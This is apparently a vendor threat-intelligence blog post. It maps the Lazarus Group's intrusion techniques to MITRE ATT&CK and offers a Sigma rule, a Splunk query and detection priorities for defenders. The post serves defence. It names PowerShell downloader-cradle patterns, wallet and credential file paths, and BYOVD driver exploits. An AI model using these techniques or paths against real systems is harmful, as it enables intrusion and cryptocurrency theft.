Lazarus Group: MITRE ATT&CK Techniques and Detection Patterns

Published March 26, 2025 · 16 min read

Lazarus Group— tracked by MITRE as G0032, by Mandiant as APT38, by CrowdStrike as Labyrinth Chollima, and by Microsoft as Diamond Sleet — is the financially motivated arm of North Korea's Reconnaissance General Bureau (RGB). Since 2014 they have stolen an estimated USD 3 billion in cryptocurrency, breached SWIFT-connected banks, and delivered the 3CX desktop client supply-chain compromise that hit thousands of downstream organisations in March 2023. This brief maps their observed TTPs to MITRE ATT&CK Enterprise v15 with detection guidance you can drop into a Sigma rule pack or your existing EDR query language.

CISA, FBI, and Treasury jointly track DPRK cyber activity under the AA20-239Aand follow-on advisories. Indian targets in this group's portfolio have included cryptocurrency exchanges, defence contractors, and a sustained 2017-present campaign of LinkedIn-mediated phishing against IT sector employees in Bengaluru, Pune, and Hyderabad. Treat the techniques below as present-tense threats, not history.

Initial access — T1566 / T1190 / T1195

Lazarus operators favour three initial-access vectors: spear-phishing with weaponised LinkedIn recruiter lures (T1566.002 — Spearphishing Link), exploiting public-facing JBoss / Confluence / MOVEit / log4j instances (T1190 — Exploit Public-Facing Application), and supply-chain compromise via poisoned npm packages, PyPI typosquats, and signed installers (T1195.002).

The 2023 3CX incident (CVE-2023-29059) chained two supply-chain compromises: an X_TRADER trading-app installer (signed by the legitimate vendor Trading Technologies) infected the build environment of a 3CX engineer, which then poisoned the Electron-based 3CX desktop client. Downstream victims received a signed, trusted update that side-loaded ffmpeg.dll with malicious code. Mandiant attributed the campaign to UNC4736 — a Lazarus sub-cluster.

The 2024 Operation Dream Job iteration spread weaponised npm modules (web3-eth-handler, react-pinch, etherscan-helper) targeting cryptocurrency engineers. The packages contained an obfuscated post-install script that pulled a second stage from a Bitbucket-hosted gist. Detection: alert in CI on any npm installof a package < 30 days old by accounts with no prior history.

Execution — T1059 / T1218

Operators commonly drop AppleSeed (Windows backdoor), CageyChameleon, or LightlessCan via PowerShell (T1059.001), Bash (T1059.004), and signed binary proxy execution using regsvr32.exe orrundll32.exe (T1218). On macOS targets they prefer osascript + AppleScript wrappers around in-memory Mach-O loaders. Lazarus is one of the most prolific abusers of LOLBAS (Living Off The Land Binaries and Scripts).

# Sigma — Lazarus PowerShell pattern (T1059.001)
title: Suspicious PowerShell IEX with base64 chunk
id: 8c7d1e2a-7b1c-4f9a-9e6d-f8a2b1c3d4e5
status: experimental
description: Detects Lazarus-style PowerShell loaders combining IEX,
  base64, and downloader cradle in a single ScriptBlock.
references:
  - https://attack.mitre.org/groups/G0032/
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains|all:
      - 'IEX'
      - 'Net.WebClient'
      - 'FromBase64String'
  filter_legitimate:
    ScriptBlockText|contains:
      - 'C:\\Program Files\\WindowsPowerShell\\Modules'
  condition: selection and not filter_legitimate
fields:
  - ComputerName
  - User
  - ScriptBlockText
falsepositives:
  - Internal red team tooling using IEX cradles
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.g0032

Persistence — T1547 / T1543

On Windows, Lazarus persists via HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Runentries (T1547.001), scheduled tasks (T1053.005), DLL hijacking against signed binaries (T1574.001), and COM hijacking on rarely-loaded CLSIDs. On macOS, LaunchDaemons under /Library/LaunchDaemons/ (T1543.004) are the preferred persistence mechanism — observed in the BLINDINGCAN and FudModule cluster, and in the JumpCloud breach of June 2023.

# Splunk SPL — LaunchDaemon written outside MDM channels
index=osquery sourcetype=osquery:results name=launchd
| where match(path, "^/Library/LaunchDaemons/")
  AND NOT match(uid, "^(0|99)$")
  AND NOT match(file_signed_authority, "(Apple|Jamf|Microsoft)")
| stats count by host, path, file_signed_authority, file_hash_sha256

Defense evasion — T1027 / T1140 / T1562

Payloads are typically VMProtect, Themida, or custom XOR-packed (T1027.002), encrypted with multi-stage RC4 + XOR loaders (T1140 — Deobfuscate/Decode Files), and drop EDR-killer drivers exploiting bring-your-own-vulnerable-driver (BYOVD) techniques (T1562.001) — recent samples leverage CVE-2021-21551 (Dell dbutil_2_3.sys) and CVE-2024-1086 (nf_tables on Linux) to disable Microsoft Defender callbacks or Falcon kernel hooks.

FudModule (the rootkit reported by Avast and ESET in 2024) takes BYOVD a step further by using appid.sys— a Microsoft-signed driver — to read and write arbitrary kernel memory and blind every userland EDR. Detection requires kernel telemetry (Microsoft's recommended driver block rules are the baseline) plus Sysmon Event ID 6 alerts on signed-but-vulnerable driver loads.

Credential access — T1003 / T1555 / T1539

lsass.exe credential dumping (T1003.001) via custom Mimikatz forks, browser credential theft (T1555.003), and session-cookie theft from Chrome/Edge profiles (T1539). For crypto-focused campaigns, operators harvest browser extensions and desktop wallet files (~/Library/Application Support/Exodus/, %APPDATA%\\Electrum\\wallets, MetaMask vault blobs from the Chrome extension storage). The post-September-2023 CryptoCore samples include a Slack desktop scraper for wallet seed phrases pasted in DM windows.

Lateral movement — T1021 / T1570

SMB admin shares with stolen NTLM hashes (T1021.002), RDP using harvested credentials (T1021.001), and lateral tool transfer via WMI / SMB (T1570). The March 2022 Ronin Bridge intrusion (USD 625 million theft from Sky Mavis, attributed by the US Treasury to Lazarus and added to the OFAC SDN list) used compromised validator nodes — Lazarus first phished an Axie Infinity engineer with a fake job offer carrying a malicious PDF, then pivoted from the engineer's laptop to four of the nine validator multisig keys.

Command & control — T1071 / T1090

HTTPS over compromised WordPress sites (T1071.001) and Tor hidden services (T1090.003) are the staples. AppleSeed beacons typically pad sleep with jitter, rotate C2 infrastructure every 24-72 hours, and route through Cloudflare-fronted domains with Domain Fronting fallbacks where the provider still allows it. Detection: alert on JA3/JA3S fingerprints inconsistent with the User-Agent and on TLS SNI / Host-header mismatches at the egress proxy.

Impact — T1657 / T1486

Lazarus is unique among state APTs in pursuing direct financial impact (T1657 — Financial Theft). Notable operations as documented in DOJ indictments and CISA advisories: Bangladesh Bank SWIFT heist (USD 81M, 2016), WannaCry (T1486 — Data Encrypted for Impact, May 2017), KuCoin (USD 281M, 2020), Ronin Bridge (USD 625M, March 2022), Atomic Wallet (USD 100M, June 2023), Stake.com (USD 41M, September 2023), and the 2024 DMM Bitcoin theft (USD 305M, attributed by FBI / DC3 / NPA Japan in December 2024).

Detection priorities for blue teams

• Alert on PowerShell EncodedCommand with > 500 byte payload (Event ID 4104), correlated with parent process not in {explorer, mmc, ise}.
• Hunt for unsigned drivers loaded after a legitimate signed parent (BYOVD pattern). Sysmon EID 6 + Event 7045 enrichment.
• Monitor LaunchDaemons created outside MDM channels on managed Macs. Osquery + Jamf telemetry.
• Block known-bad TLDs from threat intel feeds (Lazarus rotates rapidly — use STIX feeds, not static lists). MISP + Cortex XSOAR is a working stack.
• Tag npm and PyPI installs from accounts < 30 days old as suspicious in CI; require maintainer reputation score > threshold.
• EDR query: any process loading a Microsoft-signed driver from a non-system path; or any driver matching the recommended block list hashes.
• Egress: alert on outbound HTTPS to first-seen-in-7-days domains from any internal subnet, especially developer workstations.

Adversary emulation playbook

For purple-team exercises, MITRE's open Adversary Emulation Libraryships scenario plans for FIN6, OilRig, APT29, and others; Lazarus emulation is community-built and should focus on three flags: (1) supply-chain delivery via signed but malicious npm package, (2) BYOVD-driven EDR blinding, (3) lateral movement to wallet / signing system with exfil over DNS or covert HTTPS. Run a red team engagementsimulating these TTPs against your own controls — the gap between "we have EDR" and "we detect T1218.011 in 12 minutes" is where breaches happen.

What this means for your team

If you handle cryptocurrency, are a Tier-1 Indian or SE-Asian bank, employ engineers who get LinkedIn approaches from foreign "recruiters", or sit downstream of a build vendor — Lazarus is in your threat model whether you like it or not. Three concrete actions for the next 30 days: (1) ship the Sigma pack above into your SIEM and tune false positives down, (2) put npm / PyPI install policies in CI that block packages younger than 30 days from accounts with no signing history, and (3) commission a Lazarus-profile adversary emulation against the validator, wallet, or signing-key environment that holds your real value. Detection latency is the only metric that matters when the attacker's objective is moving funds in a single block.

Further reading

• MITRE ATT&CK for Financial Services — sector-level technique mapping that includes APT38 / Lazarus.
• Supply Chain Attacks 2026 — the npm / installer vector Lazarus leans on.
• Tabletop Exercise Templates — rehearse a Lazarus-style funds-theft scenario.
• Red Team Service — commission a Lazarus-profile adversary emulation.